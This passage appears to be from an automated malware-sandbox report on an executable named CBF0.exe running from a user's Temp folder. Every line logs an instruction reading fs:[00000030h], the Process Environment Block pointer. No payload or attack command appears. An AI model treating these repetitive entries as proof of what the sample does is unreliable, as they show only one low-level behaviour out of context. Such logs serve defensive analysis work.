Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56C182 mov eax, dword ptr fs:[00000030h] 29_2_6B56C182
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B61F1B5 mov eax, dword ptr fs:[00000030h] 29_2_6B61F1B5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B61F1B5 mov eax, dword ptr fs:[00000030h] 29_2_6B61F1B5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5C51BE mov eax, dword ptr fs:[00000030h] 29_2_6B5C51BE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5C51BE mov eax, dword ptr fs:[00000030h] 29_2_6B5C51BE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5C51BE mov eax, dword ptr fs:[00000030h] 29_2_6B5C51BE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5C51BE mov eax, dword ptr fs:[00000030h] 29_2_6B5C51BE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57C9BF mov eax, dword ptr fs:[00000030h] 29_2_6B57C9BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57C9BF mov eax, dword ptr fs:[00000030h] 29_2_6B57C9BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h] 29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h] 29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5699BF mov eax, dword ptr fs:[00000030h] 29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h] 29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h] 29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5699BF mov eax, dword ptr fs:[00000030h] 29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h] 29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h] 29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5699BF mov eax, dword ptr fs:[00000030h] 29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h] 29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5699BF mov ecx, dword ptr fs:[00000030h] 29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5699BF mov eax, dword ptr fs:[00000030h] 29_2_6B5699BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B60A189 mov eax, dword ptr fs:[00000030h] 29_2_6B60A189
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B60A189 mov ecx, dword ptr fs:[00000030h] 29_2_6B60A189
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5761A0 mov eax, dword ptr fs:[00000030h] 29_2_6B5761A0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5761A0 mov eax, dword ptr fs:[00000030h] 29_2_6B5761A0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B547055 mov eax, dword ptr fs:[00000030h] 29_2_6B547055
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B545050 mov eax, dword ptr fs:[00000030h] 29_2_6B545050
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B545050 mov eax, dword ptr fs:[00000030h] 29_2_6B545050
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B545050 mov eax, dword ptr fs:[00000030h] 29_2_6B545050
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B602073 mov eax, dword ptr fs:[00000030h] 29_2_6B602073
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B611074 mov eax, dword ptr fs:[00000030h] 29_2_6B611074
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56F86D mov eax, dword ptr fs:[00000030h] 29_2_6B56F86D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54F018 mov eax, dword ptr fs:[00000030h] 29_2_6B54F018
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54F018 mov eax, dword ptr fs:[00000030h] 29_2_6B54F018
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B546800 mov eax, dword ptr fs:[00000030h] 29_2_6B546800
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B546800 mov eax, dword ptr fs:[00000030h] 29_2_6B546800
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B546800 mov eax, dword ptr fs:[00000030h] 29_2_6B546800
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B558800 mov eax, dword ptr fs:[00000030h] 29_2_6B558800
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56A830 mov eax, dword ptr fs:[00000030h] 29_2_6B56A830
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56A830 mov eax, dword ptr fs:[00000030h] 29_2_6B56A830
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56A830 mov eax, dword ptr fs:[00000030h] 29_2_6B56A830
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56A830 mov eax, dword ptr fs:[00000030h] 29_2_6B56A830
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B614015 mov eax, dword ptr fs:[00000030h] 29_2_6B614015
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B614015 mov eax, dword ptr fs:[00000030h] 29_2_6B614015
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B574020 mov edi, dword ptr fs:[00000030h] 29_2_6B574020
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B61F019 mov eax, dword ptr fs:[00000030h] 29_2_6B61F019
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B61F019 mov eax, dword ptr fs:[00000030h] 29_2_6B61F019
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5470C0 mov eax, dword ptr fs:[00000030h] 29_2_6B5470C0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5470C0 mov eax, dword ptr fs:[00000030h] 29_2_6B5470C0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5528FD mov eax, dword ptr fs:[00000030h] 29_2_6B5528FD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5528FD mov eax, dword ptr fs:[00000030h] 29_2_6B5528FD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5528FD mov eax, dword ptr fs:[00000030h] 29_2_6B5528FD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56B8E4 mov eax, dword ptr fs:[00000030h] 29_2_6B56B8E4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56B8E4 mov eax, dword ptr fs:[00000030h] 29_2_6B56B8E4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5440E1 mov eax, dword ptr fs:[00000030h] 29_2_6B5440E1
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5440E1 mov eax, dword ptr fs:[00000030h] 29_2_6B5440E1
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5440E1 mov eax, dword ptr fs:[00000030h] 29_2_6B5440E1
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5458EC mov eax, dword ptr fs:[00000030h] 29_2_6B5458EC
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B543880 mov eax, dword ptr fs:[00000030h] 29_2_6B543880
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B543880 mov eax, dword ptr fs:[00000030h] 29_2_6B543880
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h] 29_2_6B54E8B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h] 29_2_6B54E8B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h] 29_2_6B54E8B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h] 29_2_6B54E8B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h] 29_2_6B54E8B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54E8B0 mov eax, dword ptr fs:[00000030h] 29_2_6B54E8B0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57F0BF mov ecx, dword ptr fs:[00000030h] 29_2_6B57F0BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57F0BF mov eax, dword ptr fs:[00000030h] 29_2_6B57F0BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57F0BF mov eax, dword ptr fs:[00000030h] 29_2_6B57F0BF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5890AF mov eax, dword ptr fs:[00000030h] 29_2_6B5890AF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5528AE mov eax, dword ptr fs:[00000030h] 29_2_6B5528AE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5528AE mov eax, dword ptr fs:[00000030h] 29_2_6B5528AE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5528AE mov eax, dword ptr fs:[00000030h] 29_2_6B5528AE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5528AE mov ecx, dword ptr fs:[00000030h] 29_2_6B5528AE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5528AE mov eax, dword ptr fs:[00000030h] 29_2_6B5528AE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5528AE mov eax, dword ptr fs:[00000030h] 29_2_6B5528AE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D5F5F mov eax, dword ptr fs:[00000030h] 29_2_6B5D5F5F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D5F5F mov eax, dword ptr fs:[00000030h] 29_2_6B5D5F5F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D5F5F mov eax, dword ptr fs:[00000030h] 29_2_6B5D5F5F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D5F5F mov eax, dword ptr fs:[00000030h] 29_2_6B5D5F5F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D5F5F mov eax, dword ptr fs:[00000030h] 29_2_6B5D5F5F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618F6A mov eax, dword ptr fs:[00000030h] 29_2_6B618F6A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54A745 mov eax, dword ptr fs:[00000030h] 29_2_6B54A745
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57DF4C mov eax, dword ptr fs:[00000030h] 29_2_6B57DF4C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B546F60 mov eax, dword ptr fs:[00000030h] 29_2_6B546F60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B546F60 mov eax, dword ptr fs:[00000030h] 29_2_6B546F60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56E760 mov eax, dword ptr fs:[00000030h] 29_2_6B56E760
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56E760 mov eax, dword ptr fs:[00000030h] 29_2_6B56E760
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57CF6A mov eax, dword ptr fs:[00000030h] 29_2_6B57CF6A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57CF6A mov eax, dword ptr fs:[00000030h] 29_2_6B57CF6A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56F716 mov eax, dword ptr fs:[00000030h] 29_2_6B56F716
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B574710 mov eax, dword ptr fs:[00000030h] 29_2_6B574710
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5DFF10 mov eax, dword ptr fs:[00000030h] 29_2_6B5DFF10
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5DFF10 mov eax, dword ptr fs:[00000030h] 29_2_6B5DFF10
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57C707 mov eax, dword ptr fs:[00000030h] 29_2_6B57C707
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57C707 mov ecx, dword ptr fs:[00000030h] 29_2_6B57C707
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57C707 mov eax, dword ptr fs:[00000030h] 29_2_6B57C707
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B546730 mov eax, dword ptr fs:[00000030h] 29_2_6B546730
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B546730 mov eax, dword ptr fs:[00000030h] 29_2_6B546730
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B546730 mov eax, dword ptr fs:[00000030h] 29_2_6B546730
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57E730 mov eax, dword ptr fs:[00000030h] 29_2_6B57E730
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56B73D mov eax, dword ptr fs:[00000030h] 29_2_6B56B73D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56B73D mov eax, dword ptr fs:[00000030h] 29_2_6B56B73D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B544F2E mov eax, dword ptr fs:[00000030h] 29_2_6B544F2E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B544F2E mov eax, dword ptr fs:[00000030h] 29_2_6B544F2E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B543FC5 mov eax, dword ptr fs:[00000030h] 29_2_6B543FC5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B543FC5 mov eax, dword ptr fs:[00000030h] 29_2_6B543FC5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B543FC5 mov eax, dword ptr fs:[00000030h] 29_2_6B543FC5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57D7CA mov eax, dword ptr fs:[00000030h] 29_2_6B57D7CA
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57D7CA mov eax, dword ptr fs:[00000030h] 29_2_6B57D7CA
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5837F5 mov eax, dword ptr fs:[00000030h] 29_2_6B5837F5
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h] 29_2_6B5737EB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h] 29_2_6B5737EB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h] 29_2_6B5737EB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h] 29_2_6B5737EB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h] 29_2_6B5737EB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h] 29_2_6B5737EB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5737EB mov eax, dword ptr fs:[00000030h] 29_2_6B5737EB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h] 29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h] 29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h] 29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542FB0 mov ecx, dword ptr fs:[00000030h] 29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h] 29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h] 29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h] 29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h] 29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h] 29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h] 29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542FB0 mov eax, dword ptr fs:[00000030h] 29_2_6B542FB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D6652 mov eax, dword ptr fs:[00000030h] 29_2_6B5D6652
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B573E70 mov eax, dword ptr fs:[00000030h] 29_2_6B573E70
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57CE6C mov eax, dword ptr fs:[00000030h] 29_2_6B57CE6C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57CE6C mov ecx, dword ptr fs:[00000030h] 29_2_6B57CE6C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5CAE60 mov eax, dword ptr fs:[00000030h] 29_2_6B5CAE60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5CAE60 mov eax, dword ptr fs:[00000030h] 29_2_6B5CAE60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5CAE60 mov eax, dword ptr fs:[00000030h] 29_2_6B5CAE60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5CAE60 mov eax, dword ptr fs:[00000030h] 29_2_6B5CAE60
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D2E14 mov eax, dword ptr fs:[00000030h] 29_2_6B5D2E14
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54C600 mov eax, dword ptr fs:[00000030h] 29_2_6B54C600
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54C600 mov eax, dword ptr fs:[00000030h] 29_2_6B54C600
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54C600 mov eax, dword ptr fs:[00000030h] 29_2_6B54C600
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5FFE3F mov eax, dword ptr fs:[00000030h] 29_2_6B5FFE3F
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57C63D mov eax, dword ptr fs:[00000030h] 29_2_6B57C63D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54A63B mov eax, dword ptr fs:[00000030h] 29_2_6B54A63B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54A63B mov eax, dword ptr fs:[00000030h] 29_2_6B54A63B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B580E21 mov eax, dword ptr fs:[00000030h] 29_2_6B580E21
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h] 29_2_6B5C5623
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h] 29_2_6B5C5623
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h] 29_2_6B5C5623
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h] 29_2_6B5C5623
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h] 29_2_6B5C5623
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h] 29_2_6B5C5623
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h] 29_2_6B5C5623
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h] 29_2_6B5C5623
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5C5623 mov eax, dword ptr fs:[00000030h] 29_2_6B5C5623
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5736CC mov eax, dword ptr fs:[00000030h] 29_2_6B5736CC
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618ED6 mov eax, dword ptr fs:[00000030h] 29_2_6B618ED6
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5716E0 mov ecx, dword ptr fs:[00000030h] 29_2_6B5716E0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5576E2 mov eax, dword ptr fs:[00000030h] 29_2_6B5576E2
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B583EE4 mov eax, dword ptr fs:[00000030h] 29_2_6B583EE4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B583EE4 mov eax, dword ptr fs:[00000030h] 29_2_6B583EE4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B583EE4 mov eax, dword ptr fs:[00000030h] 29_2_6B583EE4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57DE9E mov eax, dword ptr fs:[00000030h] 29_2_6B57DE9E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57DE9E mov eax, dword ptr fs:[00000030h] 29_2_6B57DE9E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57DE9E mov eax, dword ptr fs:[00000030h] 29_2_6B57DE9E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B543E80 mov eax, dword ptr fs:[00000030h] 29_2_6B543E80
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B543E80 mov eax, dword ptr fs:[00000030h] 29_2_6B543E80
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5C46A7 mov eax, dword ptr fs:[00000030h] 29_2_6B5C46A7
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D2EA3 mov eax, dword ptr fs:[00000030h] 29_2_6B5D2EA3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B567D50 mov eax, dword ptr fs:[00000030h] 29_2_6B567D50
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54354C mov eax, dword ptr fs:[00000030h] 29_2_6B54354C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54354C mov eax, dword ptr fs:[00000030h] 29_2_6B54354C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5F8D47 mov eax, dword ptr fs:[00000030h] 29_2_6B5F8D47
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5F3D40 mov eax, dword ptr fs:[00000030h] 29_2_6B5F3D40
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56C577 mov eax, dword ptr fs:[00000030h] 29_2_6B56C577
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56C577 mov eax, dword ptr fs:[00000030h] 29_2_6B56C577
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54F51D mov eax, dword ptr fs:[00000030h] 29_2_6B54F51D
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618D34 mov eax, dword ptr fs:[00000030h] 29_2_6B618D34
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54AD30 mov eax, dword ptr fs:[00000030h] 29_2_6B54AD30
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B574D3B mov eax, dword ptr fs:[00000030h] 29_2_6B574D3B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B574D3B mov eax, dword ptr fs:[00000030h] 29_2_6B574D3B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B574D3B mov eax, dword ptr fs:[00000030h] 29_2_6B574D3B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B571520 mov eax, dword ptr fs:[00000030h] 29_2_6B571520
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B571520 mov eax, dword ptr fs:[00000030h] 29_2_6B571520
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B571520 mov eax, dword ptr fs:[00000030h] 29_2_6B571520
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B571520 mov eax, dword ptr fs:[00000030h] 29_2_6B571520
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B571520 mov eax, dword ptr fs:[00000030h] 29_2_6B571520
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B603518 mov eax, dword ptr fs:[00000030h] 29_2_6B603518
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B603518 mov eax, dword ptr fs:[00000030h] 29_2_6B603518
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B603518 mov eax, dword ptr fs:[00000030h] 29_2_6B603518
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5FFDD3 mov eax, dword ptr fs:[00000030h] 29_2_6B5FFDD3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5415C1 mov eax, dword ptr fs:[00000030h] 29_2_6B5415C1
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5495F0 mov eax, dword ptr fs:[00000030h] 29_2_6B5495F0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5495F0 mov ecx, dword ptr fs:[00000030h] 29_2_6B5495F0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5F8DF1 mov eax, dword ptr fs:[00000030h] 29_2_6B5F8DF1
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5795EC mov eax, dword ptr fs:[00000030h] 29_2_6B5795EC
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B543591 mov eax, dword ptr fs:[00000030h] 29_2_6B543591
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B60B581 mov eax, dword ptr fs:[00000030h] 29_2_6B60B581
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B60B581 mov eax, dword ptr fs:[00000030h] 29_2_6B60B581
